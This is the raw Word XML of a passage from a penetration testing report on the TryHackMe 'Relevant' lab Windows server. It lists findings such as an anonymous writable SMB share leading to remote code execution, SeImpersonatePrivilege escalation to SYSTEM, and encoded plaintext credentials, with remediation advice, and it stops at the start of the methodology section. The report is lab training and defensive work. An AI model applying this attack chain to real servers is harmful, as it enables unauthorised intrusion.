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BA9C8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Copperplate Gothic Bold" w:hAnsi="Copperplate Gothic Bold" w:eastAsia="SimSun" w:cs="Copperplate Gothic Bold"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Copperplate Gothic Bold" w:hAnsi="Copperplate Gothic Bold" w:eastAsia="SimSun" w:cs="Copperplate Gothic Bold"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>PENETRATION TESTING REPORT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E907676">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Copperplate Gothic Bold" w:hAnsi="Copperplate Gothic Bold" w:eastAsia="SimSun" w:cs="Copperplate Gothic Bold"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63485779">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Try Hack me: Relevant Lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC8355B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="717263CA">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="11"/>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C81D31" w:themeColor="accent6" w:themeShade="BF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Ma</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="11"/>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C81D31" w:themeColor="accent6" w:themeShade="BF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="11"/>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C81D31" w:themeColor="accent6" w:themeShade="BF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>hine/Lab Information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076E1E0B">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Name:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Relevant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26461964">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Difficulty leve</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>l: Medium</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605F985A">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Operating system</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Windows Server 2016 Standard Evaluation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9F33AB">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IP Address</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: 10.49.167.173</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBFFF9C">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Test Type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Black Box Penetration Test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ABAEF3B">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Objective</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD0BBE5">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Conduct a penetration test as a malicious external attacker would</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510DB688">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Gain unauthorized access to the target system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA6963F">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Capture the User flag (user.txt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E66722">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Escalate privileges to SYSTEM level</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B58C6D">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Capture the Root flag (root.txt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248AC5DE">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Document all vulnerabilities, exploitation steps, and remediation recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A51609D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55388E79">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E95558A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">This is a comprehensive and complete penetration testing report of a windows server from the simulated lab </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://tryhackme.com/room/relevant" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Relevant</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Try Hack Me. It successfully demonstrated that an unauthenticated attacker can achieve complete system compromise through a chain of critical vulnerabilities. Some of the findings from this pen test are:</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021"/>
        <w:gridCol w:w="1014"/>
        <w:gridCol w:w="3141"/>
        <w:gridCol w:w="240"/>
      </w:tblGrid>
      <w:tr w14:paraId="72B0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tcBorders>
              <w:tl2br w:val="nil"/>
              <w:tr2bl w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="27AA279B">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Finding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:tl2br w:val="nil"/>
              <w:tr2bl w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="14EFD399">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Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3111" w:type="dxa"/>
            <w:tcBorders>
              <w:tl2br w:val="nil"/>
              <w:tr2bl w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3FA268D9">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Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="195" w:type="dxa"/>
            <w:tcBorders>
              <w:tl2br w:val="nil"/>
              <w:tr2bl w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="082C515D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4760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E2B5EA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Anonymous Writable SMB Share</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:tl2br w:val="nil"/>
              <w:tr2bl w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="39765FB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Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3111" w:type="dxa"/>
            <w:tcBorders>
              <w:tl2br w:val="nil"/>
              <w:tr2bl w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="034B6E6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Allows Remote code execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="195" w:type="dxa"/>
            <w:tcBorders>
              <w:tl2br w:val="nil"/>
              <w:tr2bl w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5A3D7E6E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="12C9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87CE86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SeImpersonatePrivilege Misconfiguration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:tl2br w:val="nil"/>
              <w:tr2bl w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7DC7540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Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3111" w:type="dxa"/>
            <w:tcBorders>
              <w:tl2br w:val="nil"/>
              <w:tr2bl w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="051C6C1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Privilege escalation to System Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="195" w:type="dxa"/>
            <w:tcBorders>
              <w:tl2br w:val="nil"/>
              <w:tr2bl w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="54552F35">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="23C6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66176F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Base64 Encoded Credentials in Plain text</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:tl2br w:val="nil"/>
              <w:tr2bl w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3B38BDC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Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3111" w:type="dxa"/>
            <w:tcBorders>
              <w:tl2br w:val="nil"/>
              <w:tr2bl w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4950588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Exposure of crucial user credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="195" w:type="dxa"/>
            <w:tcBorders>
              <w:tl2br w:val="nil"/>
              <w:tr2bl w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="39611E21">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3BDB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917902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SMB Message Signing Disabled</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:tl2br w:val="nil"/>
              <w:tr2bl w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3F61757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3111" w:type="dxa"/>
            <w:tcBorders>
              <w:tl2br w:val="nil"/>
              <w:tr2bl w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3AF2752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Susceptibility to SMB relay attacks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="195" w:type="dxa"/>
            <w:tcBorders>
              <w:tl2br w:val="nil"/>
              <w:tr2bl w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0CA66B7D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0B78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977E33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IIS Default Configuration Exposure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:tl2br w:val="nil"/>
              <w:tr2bl w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6505515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3111" w:type="dxa"/>
            <w:tcBorders>
              <w:tl2br w:val="nil"/>
              <w:tr2bl w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2A67E91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Information disclosure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="195" w:type="dxa"/>
            <w:tcBorders>
              <w:tl2br w:val="nil"/>
              <w:tr2bl w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="77EBB4D1">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="458F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48341A5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:tl2br w:val="nil"/>
              <w:tr2bl w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4A9CA023">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3111" w:type="dxa"/>
            <w:tcBorders>
              <w:tl2br w:val="nil"/>
              <w:tr2bl w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2394D791">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="195" w:type="dxa"/>
            <w:tcBorders>
              <w:tl2br w:val="nil"/>
              <w:tr2bl w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="699B5D29">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="71BF75D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following are the business impacts that such an attack would have:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E2DFE9">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~Gain unauthorized remote access to the server without any credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0B44B8">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~Execute arbitrary commands with SYSTEM-level privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDAEC1E">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~Access sensitive data including user credentials and system files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D05D823">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~Compromise the entire server and use it as a pivot point for further attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C22EB6">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~Cause operational disruption through malicious actions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8F07ED">
      <w:pPr>
        <w:ind w:left="720" w:leftChars="0" w:firstLine="720" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EF930E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Some of the recommendations include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039DC63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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Immediately restrict anonymous access to SMB shares</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BBF15C">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~Apply the principle of least privilege - remove SeImpersonatePrivilege from non-administrative accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBAC172">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~Implement secure credential storage - never store passwords in plain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>text or simple encoding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A1134E">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~Enable SMB message signing to prevent relay attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43736C62">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~Conduct regular security assessments to identify and remediate vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA7C344">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Engagement Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C31CA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This is a black box penetration Testing that was conducted on the Relevant windows server to be able to see how vulnerable it is to exploitation and how to Mitigate the vulnerabilities before they are exploited by a malicious attacker. The rules of engagement for these pen test were as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B4B5C3">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Period</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: One week</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FEC435">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Methodology</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Black box -no prior information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F409AC2">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Authorization</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Simulated lab authorized for learning purposes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25FC3A44">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Data Handling</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: All discovered credentials and flags to be handled confidentially and no write ups to be uploaded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD5E0D9">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Methodology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF0DB2F">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="11"/>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="EF949E" w:themeColor="accent6" w:themeTint="99"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="accent6">
                <w14:lumMod w14:val="60000"/>
                <w14:lumOff w14:val="40000"/>
              </w14:schemeClr>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ABFBAD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This penetration testing followed a structured methodology based on the industry standard frameworks such as PTES (Penetration Testing Execution Standard), OWASP Testing Guide Principles, Metasploit and MITRE ATT&amp;CK Framework for Attack Mapping.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF90926">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="EF949E" w:themeColor="accent6" w:themeTint="99"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="accent6">
                <w14:lumMod w14:val="60000"/>
                <w14:lumOff w14:val="40000"/>
              </w14:schemeClr>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="11"/>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="EF949E" w:themeColor="accent6" w:themeTint="99"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="accent6">
                <w14:lumMod w14:val="60000"/>
                <w14:lumOff w14:val="40000"/>
              </w14:schemeClr>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Phases of Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B22790">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Reconnaissance and Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB3D0DC">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Aim:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
